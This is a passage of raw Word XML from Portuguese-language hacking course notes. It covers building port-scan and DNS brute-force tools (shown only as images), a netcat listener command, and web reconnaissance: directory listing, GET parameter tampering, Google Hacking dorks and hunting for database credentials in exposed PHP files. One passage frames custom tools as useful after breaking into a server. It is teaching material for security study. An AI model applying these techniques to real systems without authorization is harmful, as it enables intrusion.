          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP/Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614BA50" w14:textId="77777777" w:rsidR="008D673B" w:rsidRPr="00711C8C" w:rsidRDefault="008D673B" w:rsidP="00B93831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E96F70D" w14:textId="4F2758BB" w:rsidR="008D673B" w:rsidRPr="00B007BE" w:rsidRDefault="008D673B" w:rsidP="008D673B">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc156597593"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aula 6 – Criando suas próprias ferramentas hacker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="3383EAE1" w14:textId="4189062C" w:rsidR="00315E96" w:rsidRPr="00711C8C" w:rsidRDefault="00315E96" w:rsidP="00315E96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BEA871" w14:textId="3C2BA867" w:rsidR="00315E96" w:rsidRPr="00711C8C" w:rsidRDefault="00315E96" w:rsidP="00315E96">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ferramenta Port-Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016595D8" w14:textId="1A09EAFC" w:rsidR="008D673B" w:rsidRPr="00711C8C" w:rsidRDefault="008D673B" w:rsidP="00B93831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09888191" w14:textId="4244AF38" w:rsidR="00A84E1E" w:rsidRPr="00711C8C" w:rsidRDefault="001E61B1" w:rsidP="00B93831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27D98532" wp14:editId="677302F0">
            <wp:extent cx="6398585" cy="3291840"/>
            <wp:effectExtent l="0" t="0" r="254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7514" cy="329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BEC0" w14:textId="5C0FF7A3" w:rsidR="001E61B1" w:rsidRPr="00711C8C" w:rsidRDefault="001E61B1" w:rsidP="00B93831">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9C0A4B" w14:textId="16201F06" w:rsidR="001E61B1" w:rsidRPr="00711C8C" w:rsidRDefault="001D0D5B" w:rsidP="001E61B1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">No shell, o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc -lvp PORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> espera por uma conexão com o cliente, cria um servidorzinho.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952E5A5" w14:textId="2C40DB2F" w:rsidR="001D0D5B" w:rsidRPr="00711C8C" w:rsidRDefault="001D0D5B" w:rsidP="001E61B1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2577A9" w14:textId="1102A3D0" w:rsidR="001D0D5B" w:rsidRPr="00B007BE" w:rsidRDefault="00A40C89" w:rsidP="00A40C89">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc156597594"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Se eu tenho NMAP e outras ferramentas pra fazer </w:t>
      </w:r>
      <w:r w:rsidR="00D210A7" w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ort </w:t>
      </w:r>
      <w:r w:rsidR="00D210A7" w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cann</w:t>
      </w:r>
      <w:r w:rsidR="00D210A7" w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, para que eu vou fazer minhas próprias ferramentas?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="073AB589" w14:textId="7B2CBB82" w:rsidR="00A40C89" w:rsidRPr="00711C8C" w:rsidRDefault="00A40C89" w:rsidP="00A40C89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E4FA61" w14:textId="371DA94F" w:rsidR="007E656B" w:rsidRPr="00711C8C" w:rsidRDefault="00B224E1" w:rsidP="0094316A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>É bom ter esse conhecimento, se supostamente você invada um servidor e não consiga fazer a instalação das ferramentas, você visualizar alguma linguagem de programação instalada no servidor, você pode programar e utilizar sua própria ferramenta para escaneamento interno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E985DC4" w14:textId="77777777" w:rsidR="007E656B" w:rsidRPr="00711C8C" w:rsidRDefault="007E656B" w:rsidP="00A40C89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EECD801" w14:textId="7B0F08F2" w:rsidR="00315E96" w:rsidRPr="00711C8C" w:rsidRDefault="00F80627" w:rsidP="00F80627">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ferramenta DNS-Brute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E9FAD" w14:textId="33B0827F" w:rsidR="00F06E5F" w:rsidRPr="00711C8C" w:rsidRDefault="00F06E5F" w:rsidP="00F80627">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="158B0307" w14:textId="4284AA9A" w:rsidR="00F06E5F" w:rsidRPr="00711C8C" w:rsidRDefault="007E656B" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2552757F" wp14:editId="75EDE55A">
            <wp:extent cx="6148381" cy="3419061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5632" cy="342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F236" w14:textId="700ADD2D" w:rsidR="007E656B" w:rsidRPr="00711C8C" w:rsidRDefault="007E656B" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5A2F78" w14:textId="0B84EDD4" w:rsidR="007E656B" w:rsidRPr="00B007BE" w:rsidRDefault="007E656B" w:rsidP="007E656B">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc156597595"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aula 7 – Reconhecimento Web – Encontrando Vulnerabilidades</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="05A48774" w14:textId="13ED31C7" w:rsidR="007E656B" w:rsidRPr="00711C8C" w:rsidRDefault="007E656B" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD40633" w14:textId="7DEDB449" w:rsidR="007E656B" w:rsidRPr="00711C8C" w:rsidRDefault="000C2440" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Possíveis técnicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232A5001" w14:textId="294BF707" w:rsidR="000C2440" w:rsidRPr="00711C8C" w:rsidRDefault="000C2440" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62509804" w14:textId="32CFF663" w:rsidR="000C2440" w:rsidRPr="00711C8C" w:rsidRDefault="000C2440" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:tab/>
        <w:t>1 – Procurar por algo na View Page Source, você pode encontrar diretórios de images, assets entre outros</w:t>
      </w:r>
      <w:r w:rsidR="000945CF" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">. Pode encontrar arquivos sensíveis como de: Backup. </w:t>
      </w:r>
      <w:r w:rsidR="0046746F" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[VULNERABILIDADE: DIRECTORY LISTING]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7343A" w14:textId="77777777" w:rsidR="0046746F" w:rsidRPr="00711C8C" w:rsidRDefault="0046746F" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7295EE" w14:textId="4C2185CD" w:rsidR="000C2440" w:rsidRPr="00711C8C" w:rsidRDefault="000C2440" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="00387127" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00387127" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Extrair metadados de imagens, pode conseguir alguma informação importante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D16E316" w14:textId="107BD904" w:rsidR="000945CF" w:rsidRPr="00711C8C" w:rsidRDefault="000945CF" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A42536" w14:textId="02C83969" w:rsidR="00660B6A" w:rsidRPr="00711C8C" w:rsidRDefault="000945CF" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">3 - </w:t>
      </w:r>
      <w:r w:rsidR="00745FA7" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00745FA7" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4753174D" wp14:editId="4A67EC9E">
            <wp:extent cx="3028950" cy="413468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6425"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3028950" cy="41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5FA7" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">, Tentar bypassar parâmetros no back-end, </w:t>
      </w:r>
      <w:r w:rsidR="00745FA7" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00745FA7" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00745FA7" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>(parâmetro get), id (nome do pa</w:t>
      </w:r>
      <w:r w:rsidR="00745FA7" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>râmetro) 3 (valor).</w:t>
      </w:r>
      <w:r w:rsidR="00660B6A" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Sempre que tiver </w:t>
      </w:r>
      <w:r w:rsidR="00660B6A" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>(?)</w:t>
      </w:r>
      <w:r w:rsidR="00660B6A" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>, significa que voce pode passar parâmetros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F25D1" w14:textId="4CB34A02" w:rsidR="00660B6A" w:rsidRPr="00711C8C" w:rsidRDefault="00660B6A" w:rsidP="007E656B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noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizar o </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>(&amp;)</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>, exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> (/cat.php?id3&amp;name=igor)</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> , no back-end traria informações dos dois nomes de parâmetros passados ao get.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8C7A1" w14:textId="77777777" w:rsidR="00660B6A" w:rsidRPr="00711C8C" w:rsidRDefault="00660B6A" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FE628C" w14:textId="2A444C99" w:rsidR="002E7751" w:rsidRPr="00711C8C" w:rsidRDefault="00660B6A" w:rsidP="007E656B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noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">4 -  </w:t>
      </w:r>
      <w:r w:rsidR="00794127" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Interessante fazer o Google Hacking, para encontrar links diretamente do site, (busca avançada)</w:t>
      </w:r>
      <w:r w:rsidR="002E7751" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B605A" w14:textId="6D607908" w:rsidR="005D7AF2" w:rsidRPr="00711C8C" w:rsidRDefault="005D7AF2" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>intitle:“ ”, site:” ”, inurl:” ”, etc...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D30BA5" w14:textId="4E666955" w:rsidR="005D7AF2" w:rsidRPr="00711C8C" w:rsidRDefault="005D7AF2" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/google-hacking-database</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A644FD7" w14:textId="5845426A" w:rsidR="00BB0D0B" w:rsidRPr="00711C8C" w:rsidRDefault="00BB0D0B" w:rsidP="007E656B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 xml:space="preserve">Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00711C8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://securitytrails.com/blog/google-hacking-techniques</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1908AAAA" w14:textId="3DD401B7" w:rsidR="005D7AF2" w:rsidRPr="00711C8C" w:rsidRDefault="005D7AF2" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AFF2275" w14:textId="38D9C782" w:rsidR="00711C8C" w:rsidRDefault="00EB4CC8" w:rsidP="00711C8C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noProof/>
        </w:rPr>
        <w:t>O Google Hacking Database, como o próprio nome já diz, é um banco de dados onde são armazenadas algumas operações de busca do Google, previamente criadas para conseguir informações específicas em suas pesquisas. Foi criado com o objetivo de catalogar todas as buscas que exploram vulnerabilidades em seus resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257A07AE" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRPr="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00711C8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA38C40" w14:textId="5C5A6FD3" w:rsidR="00C15BB4" w:rsidRPr="00711C8C" w:rsidRDefault="00C15BB4" w:rsidP="007E656B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>JavaScript Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> como jQuery, geralmente não tem muita vulnerabilidade que seja de fácil exploração, sempre vai ser um cenário mais específico ou vai depender de usuário executando algo malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7B61E5" w14:textId="77777777" w:rsidR="00C15BB4" w:rsidRPr="00711C8C" w:rsidRDefault="00C15BB4" w:rsidP="00C15BB4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF25706" w14:textId="4D7114F5" w:rsidR="005D7AF2" w:rsidRPr="00711C8C" w:rsidRDefault="005D7AF2" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="104FE9AB" wp14:editId="56E78BCF">
            <wp:extent cx="5400040" cy="24193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DE5" w14:textId="77777777" w:rsidR="002E7751" w:rsidRPr="00711C8C" w:rsidRDefault="002E7751" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091B1D63" w14:textId="4B46DA02" w:rsidR="002E7751" w:rsidRPr="00711C8C" w:rsidRDefault="002E7751" w:rsidP="002E7751">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="218A3FEA" wp14:editId="708E1673">
            <wp:extent cx="4890908" cy="1992826"/>
            <wp:effectExtent l="0" t="0" r="508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811" cy="19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5C88" w14:textId="77777777" w:rsidR="002E7751" w:rsidRPr="00711C8C" w:rsidRDefault="002E7751" w:rsidP="007E656B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2601A7FE" w14:textId="601167B9" w:rsidR="002E7751" w:rsidRPr="00711C8C" w:rsidRDefault="002E7751" w:rsidP="007E656B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noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>5 – Arquivos php são executados no servidor e quando executados retorna uma página HTML, por isso não consegue ler o conteúdo. Mas se supostamene você abra arquivos que consegue ver seu conteúdo, pode-se procurar o código que faz conexão com o banco de dados.</w:t>
      </w:r>
    </w:p>
